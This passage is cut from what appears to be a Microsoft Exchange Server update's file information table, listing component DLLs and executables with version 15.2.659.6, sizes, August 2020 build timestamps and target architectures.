15.2.659.6| 18,312| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.659.6| 15,240| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.659.6| 27,528| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.659.6| 30,592| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.659.6| 22,408| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.659.6| 66,432| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.659.6| 29,568| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.659.6| 19,840| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.659.6| 20,352| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.659.6| 19,328| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.659.6| 34,176| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.659.6| 103,816| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.659.6| 31,608| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.659.6| 20,864| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.659.6| 16,256| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.659.6| 49,024| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.659.6| 44,416| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.659.6| 38,272| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.659.6| 10,375,040| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.659.6| 29,064| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.659.6| 24,448| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.659.6| 21,896| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.659.6| 89,472| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.659.6| 20,864| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.659.6| 26,504| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.659.6| 28,040| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.659.6| 28,552| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.659.6| 36,224| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.659.6| 16,768| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.659.6| 19,848| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.659.6| 19,840| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.659.6| 57,224| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.659.6| 18,816| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.659.6| 16,256| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.659.6| 17,800| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.659.6| 15,240| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.659.6| 15,240| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.659.6| 52,616| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.659.6| 18,312| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.659.6| 34,184| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.659.6| 18,816| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.659.6| 43,392| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.659.6| 165,248| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.659.6| 54,656| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.659.6| 9,056,128| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.659.6| 33,152| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.659.6| 124,288| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.659.6| 82,824| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.659.6| 30,088| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.659.6| 661,376| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.659.6| 63,352| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.659.6| 175,488| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.659.6| 2,791,808| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.659.6| 53,120| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.659.6| 151,928| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.659.6| 966,528| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.659.6| 185,216| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.659.6| 31,616| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.659.6| 39,800| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.659.6| 105,856| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.659.6| 95,104| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.659.6| 43,392| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.659.6| 18,816| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.659.6| 172,928| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.659.6| 102,784| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.659.6| 98,680| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.659.6| 188,808| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.659.6| 43,400| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.659.6| 447,360| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.659.6| 89,992| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.659.6| 107,904| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.659.6| 374,656| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.659.6| 193,920| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.659.6| 552,328| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.659.6| 16,256| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.659.6| 15,736| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.659.6| 321,408| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.659.6| 17,800| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.659.6| 45,440| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.659.6| 18,304| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.659.6| 20,864| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.659.6| 415,104| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.659.6| 1,269,632| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.659.6| 39,296| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.659.6| 433,024| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.659.6| 4,563,336| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.659.6| 260,992| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.659.6| 33,672| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.659.6| 94,080| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.659.6| 586,120| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.659.6| 3,542,400| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.659.6| 67,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.dll| 15.2.659.6| 16,487,304| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.659.6| 58,752| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.659.6| 23,936| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.659.6| 101,760| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.659.6| 543,624| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.659.6| 305,032| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.659.6| 273,792| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.659.6| 418,688| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.659.6| 275,832| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.659.6| 70,520| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.659.6| 7,873,408| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.659.6| 1,502,088| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.659.6| 71,552| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.659.6| 1,238,912| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.659.6| 1,876,872| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.659.6| 5,366,656| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.659.6| 36,224| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.659.6| 117,640| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.659.6| 207,744| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.659.6| 79,744| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.659.6| 156,032| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.659.6| 65,912| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.659.6| 30,600| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.659.6| 58,240| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.659.6| 29,568| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.659.6| 175,488| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.659.6| 28,544| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.659.6| 75,136| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.659.6| 207,232| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.659.6| 440,704| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.659.6| 83,328| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.659.6| 35,200| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.659.6| 53,120| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.659.6| 96,640| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.migration.dll| 15.2.659.6| 1,109,888| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.659.6| 14,728| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.659.6| 135,552| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.659.6| 5,066,632| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.659.6| 19,840| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.659.6| 68,480| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.net.dll| 15.2.659.6| 5,086,072| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.659.6| 265,600| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.659.6| 37,768| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.659.6| 14,208| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.659.6| 549,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.659.6| 22,912| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.659.6| 106,368| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.659.6| 291,720| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.659.6| 17,288| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.659.6| 277,896| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.odata.dll| 15.2.659.6| 2,993,544| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.659.6| 90,504| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.659.6| 101,768| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.659.6| 38,272| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.659.6| 45,440| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.659.6| 58,248| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.659.6| 147,336| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.659.6| 26,496| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.659.6| 184,192| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.659.6| 26,496| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.659.6| 38,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.659.6| 55,680| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.659.6| 147,336| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.659.6| 191,872| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.659.6| 33,672| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.659.6| 28,032| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.659.6| 32,648| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.659.6| 17,280| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.659.6| 106,888| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.659.6| 106,888| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.659.6| 42,888| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.659.6| 264,576| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.659.6| 264,576| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.659.6| 358,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.659.6| 4,166,016| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.659.6| 308,608| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.659.6| 41,344| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.659.6| 30,592| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.659.6| 137,088| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.659.6| 441,728| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.659.6| 224,648| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.659.6| 105,864| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.pst.dll| 15.2.659.6| 168,832| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.659.6| 168,832| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.659.6| 259,464| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.659.6| 72,072| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.659.6| 215,944| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.659.6| 106,872| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.659.6| 425,856| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.659.6| 70,528| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.659.6| 46,456| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.659.6| 215,944| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.query.core.dll| 15.2.659.6| 168,320| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.659.6| 343,424| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.659.6| 174,464| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.659.6| 95,112| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.659.6| 127,360| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.659.6| 63,360| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.659.6| 36,744| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.659.6| 17,800| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.659.6| 9,666,952| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.659.6| 20,788,096| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.659.6| 36,736| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.659.6| 97,664| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.659.6| 28,544| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.659.6| 72,072| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.659.6| 59,272| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpc.dll| 15.2.659.6| 1,646,984| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.659.6| 207,232| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.659.6| 60,288| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.659.6| 518,024| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.659.6| 161,152| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.659.6| 724,352| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.659.6| 234,872| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.659.6| 20,864| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.659.6| 35,208| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.659.6| 42,376| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.659.6| 56,192| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.659.6| 27,520| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.659.6| 130,440| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.659.6| 14,720| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.659.6| 20,352| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.659.6| 267,648| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.659.6| 110,984| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.659.6| 112,512| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.659.6| 622,464| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.659.6| 185,216| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.659.6| 12,168| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.659.6| 19,336| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.search.core.dll| 15.2.659.6| 211,848| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.659.6| 17,800| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.659.6| 97,664| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.659.6| 16,776| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.659.6| 436,616| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.files.dll| 15.2.659.6| 274,304| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.659.6| 24,968| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.659.6| 217,984| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.search.service.exe| 15.2.659.6| 26,496| 12-Aug-2020| 21:25| x86 